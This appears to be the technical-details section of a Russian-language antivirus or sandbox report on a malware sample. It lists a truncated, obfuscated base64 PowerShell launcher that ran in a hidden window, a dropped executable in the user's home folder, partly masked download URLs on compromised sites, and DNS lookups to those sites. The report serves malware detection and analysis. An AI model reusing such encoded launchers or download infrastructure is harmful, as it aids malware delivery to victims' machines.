Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAFMASQBIAEkAdwBrAG0APQAnAEUARwBBAEEATgBmAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAFUAcgBpAHQAYAB5AFAAUgBPAGAAVABPAGAAYwBPAGwAIgAgAD...
- %HOMEPATH%\274.exe
- %HOMEPATH%\274.exe
- http://bl##.##cleoevent.com/wp-admin/euxc_51bv_aozo1mk/
- http://ro####ntheos.com/dmctq/5r_yz7_gafgjvu/
- http://re####tandart.ru/wp-content/8t12_03_vz8pzyfhky/
- http://by####perevodov.su/wp-content/lz3_72_s/
- DNS ASK bl##.##cleoevent.com
- DNS ASK ro####ntheos.com
- DNS ASK xs##l.cn
- DNS ASK re####tandart.ru
- DNS ASK by####perevodov.su
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAFMASQBIAEkAdwBrAG0APQAnAEUARwBBAEEATgBmAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAFUAcgBpAHQAYAB5AFAAUgBPAGAAVABPAGAAYwBPAGwAIgAgAD...' (со скрытым окном)